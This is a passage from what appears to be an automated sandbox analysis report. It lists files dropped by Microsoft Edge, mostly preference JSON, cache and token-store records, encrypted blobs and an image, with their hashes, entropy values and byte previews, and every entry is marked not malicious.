                                                                                                                                                                                                                                                            SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                            SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):29
                                                                                                                                                                                                                                                            Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                            MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                            SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                            SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                            SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):575056
                                                                                                                                                                                                                                                            Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                            MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                            SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                            SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                            SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):460992
                                                                                                                                                                                                                                                            Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                            MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                            SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                            SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                            SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):9
                                                                                                                                                                                                                                                            Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                            MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                            SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                            SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                            SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:uriCache_
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                                            Entropy (8bit):4.957807182289663
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:YTyLSmafBoTfB/1+JozROWtm5EQnqdbRWE/QNAo2AvHfjg9PIAcigVdO/dn:YWLSGTpoJo9w5/nmbRL/ov/EMLe/dn
                                                                                                                                                                                                                                                            MD5:8AEC744C1E81AB2E19E61D8EF7AEDE26
                                                                                                                                                                                                                                                            SHA1:8B9BE13E3AD314D339B481440C683DFD19F11350
                                                                                                                                                                                                                                                            SHA-256:5FC6D793C728936BF424657DADCEE1928E3437CD667CF926E252230AB9DB8452
                                                                                                                                                                                                                                                            SHA-512:9A1544573CE81117DFEAF5C0F7E1BB48E0C17D7BC10682E13210EBEB9DC043143D095E7F7640C73E46CF0DDAC917291B97B4A1396D45554BE335D61157500B97
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"version":1,"cache_data":[{"file_hash":"82ce00585b790f56","server_context":"1;c5faad59-a2e3-31f2-b86e-aaf958e12824;phsh:005;7e-05","result":0,"expiration_time":1741480812489792}]}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):86
                                                                                                                                                                                                                                                            Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQan:YQ3Kq9X0dMgAEwjM
                                                                                                                                                                                                                                                            MD5:961E3604F228B0D10541EBF921500C86
                                                                                                                                                                                                                                                            SHA1:6E00570D9F78D9CFEBE67D4DA5EFE546543949A7
                                                                                                                                                                                                                                                            SHA-256:F7B24F2EB3D5EB0550527490395D2F61C3D2FE74BB9CB345197DAD81B58B5FED
                                                                                                                                                                                                                                                            SHA-512:535F930AFD2EF50282715C7E48859CC2D7B354FF4E6C156B94D5A2815F589B33189FFEDFCAF4456525283E993087F9F560D84CFCF497D189AB8101510A09C472
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":0}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):43097
                                                                                                                                                                                                                                                            Entropy (8bit):6.083841219262307
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:PMkbJ6eg6KzhXRLtkAKYm9i1zNtG25YlD06Ev18FCT9miOfCiobJDSgzMMd6qD4q:PMk16zRRSAK4mieFobtSmd6qE72
                                                                                                                                                                                                                                                            MD5:915FB949A891D7C2D456AA0D3D5E9480
                                                                                                                                                                                                                                                            SHA1:A3FC8490AD597450A05ADD13CBB4DA8D5A1473CC
                                                                                                                                                                                                                                                            SHA-256:AE8298EF829E743FCECDC1CBB97F59D45D742A9C07964501AE35636B1226CDEF
                                                                                                                                                                                                                                                            SHA-512:5CC9D1097845B32E9BB68DAAC3E392CEC9FCE15C51E019A79904616D8820D1890F265962B111AD26EF19852ED3D4775C119C6F7F5A39F61C23CCB26902A0B1E8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385827393485262","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdK
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):43097
                                                                                                                                                                                                                                                            Entropy (8bit):6.083829328940511
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:PMkbJ6eg6KzhXRLtkA9Ym9i1zNth25YlD06Ev18FCT9miOfCiobJDSgzMMd6qD4q:PMk16zRRSA9NmieFobtSmd6qE72
                                                                                                                                                                                                                                                            MD5:537ABCCA8FCC92DB749C3F348078D419
                                                                                                                                                                                                                                                            SHA1:1DA7D0AD5EDB486A63A980F85DE23631FF4ADC88
                                                                                                                                                                                                                                                            SHA-256:5A540A4285DC06FF8AA66A7AF024C87F21D80F7DBC1C38D2CFD96A57E1A2128C
                                                                                                                                                                                                                                                            SHA-512:6B0A08575860ED403F126018FEAF4095CF8AFC13A8E5404C95AFD24100BA0C136BEFDD6310F3FBB3E2F47721A683F9C2652D1307223D4CE39985019C33D07FF6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385827393485262","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdK
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):43020
                                                                                                                                                                                                                                                            Entropy (8bit):6.083944643625739
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:PMkbJ6eg6KzhXRLtkVKYm9i1zNtPe25YlD06Ev18FCT9miOfCiobJDSgzMMd6qDl:PMk16zRRSVKMlmieFobtSmd6qE72
                                                                                                                                                                                                                                                            MD5:C8D953EE2E7D1782E80406B5941824E7
                                                                                                                                                                                                                                                            SHA1:0536E819379FDBBFBB3A433500CE12607298F80C
                                                                                                                                                                                                                                                            SHA-256:9307D6240194019518DB1055D322D5310C9D8F78838761C1DA8EC4AB1B5DA43F
                                                                                                                                                                                                                                                            SHA-512:9C86C661E1355FAA5AFAD77A6F98D7CD7FFA20657134AEC05486862103B363EC3CB0A6A070276E1272A05ADD2659982963890342FB5950014F47EA4B9BD3A639
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385827393485262","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdK
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2278
                                                                                                                                                                                                                                                            Entropy (8bit):3.8470674923270427
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:uiTrlKxrgxGxl9Il8uxfU0tkGJxpQl8Amd1rc:m3YXfUUNLg
                                                                                                                                                                                                                                                            MD5:2D1BB6DEBA68D9F977D42E84E7BEFF86
                                                                                                                                                                                                                                                            SHA1:0061A63AB46A2ED470C2320F59EF5A9846635AAC
                                                                                                                                                                                                                                                            SHA-256:BCBD802150F58837387ED32E1EED4B3EE54754B0FBE143241DE7AB9C91587D0A
                                                                                                                                                                                                                                                            SHA-512:96B3DE56B686A78C759077C1D96FC4F6A24E862F386DF5DF8E840D717F50D89BE610F5C4B82A41E29A9F14B8FEAC36B41ED75B4CE20E612C6F76FF0D3E3FD35C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.O./.B.g.K.m.P.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.N.n.o.7.e.a.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4622
                                                                                                                                                                                                                                                            Entropy (8bit):3.9907285564937585
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:fYXDZITm3zDo3jhz6a9zpdrlYUhWvSVOMgtkSfOf:fUZd3zUzhz60pdrlLhWvfxuD
                                                                                                                                                                                                                                                            MD5:F6FFF89418506CD207234BB42DEEE797
                                                                                                                                                                                                                                                            SHA1:43BAEA1A52C7722BFA4E03875ABFE58E3F986C27
                                                                                                                                                                                                                                                            SHA-256:5DF63403AB2B2AB126FB31DC23D12EBF5FE20C7E55717BD182099B9954A42CDE
                                                                                                                                                                                                                                                            SHA-512:7B01F604DE69F9DF963BC41F166E3D026CBD2C9E48C779E5833D4C576CA16AD655EFE231FC3B81026257C55701CB3830E9D614074738586BF3F1AC09B09D3908
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".k.l.a.o.Z.q.G.P.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.N.n.o.7.e.a.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2684
                                                                                                                                                                                                                                                            Entropy (8bit):3.897223053380985
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:uiTrlKx68Wa7xoxl9Il8uxN1slRPdooyX1Zh5AqATmC6yBgEizd/vc:aqYXN1slYX1v6qFC6yWEiu
                                                                                                                                                                                                                                                            MD5:15A8BAFB7F8F654C1F9EAAE1A0DBF795
                                                                                                                                                                                                                                                            SHA1:A3964AE3CB91AC479A83F17AAB549A2E2F681F4B
                                                                                                                                                                                                                                                            SHA-256:F3242DACD4E7165812E9DE81E51A0B441D010DD65CB0DF6133D0FB630B4D96EE
                                                                                                                                                                                                                                                            SHA-512:07965FD7305B27F25E09BA094303263229033836C2535F0AA2573DAA951865B11E05D4CBE3AB3E404335EF7B67E175F905D7789C70CB737397F60D64A4555381
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".5.V.d.J.l.n.K.u.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.N.n.o.7.e.a.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):206855
                                                                                                                                                                                                                                                            Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                            MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                            SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                            SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                            SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 276634
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):410885
                                                                                                                                                                                                                                                            Entropy (8bit):7.998889045816899
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:12288:uTi9JPNfgBTIxXL2v6YRl5JCqqpRFW0X2yk:Is1IBTI9LkhSqqQ0Xq
